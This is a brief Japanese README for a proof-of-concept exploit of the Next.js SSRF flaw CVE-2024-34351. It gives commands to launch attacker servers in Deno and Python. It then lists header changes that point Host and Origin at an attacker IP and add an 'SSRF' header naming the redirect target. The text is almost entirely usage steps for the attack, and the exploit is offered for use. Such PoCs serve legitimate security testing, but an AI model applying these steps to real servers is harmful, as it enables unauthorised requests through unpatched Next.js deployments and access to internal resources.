
NextJS SSRF(CVE-2024-34351)を完全に悪用するPoC
NextJS SSRF を完全に悪用するための PoC です。攻撃者は CVE-2024-34351 の脆弱性を利用して、Next.js サーバーから任意の Web サイトのコンテンツを取得できます。この脆弱性は [email protected] で修正されています。
deno run --allow-net --allow-read attacker-server.ts
python3 attacker-server.py
Host ヘッダーを攻撃者サーバーに変更します。(例: Host: 192.198.0.144:8000)Origin ヘッダーを攻撃者サーバーに変更します。(例: Origin: http://192.198.0.144:8000/)SSRF という新しいヘッダーを追加して、リダイレクト先を指定します。(例: SSRF: http://example.com/test)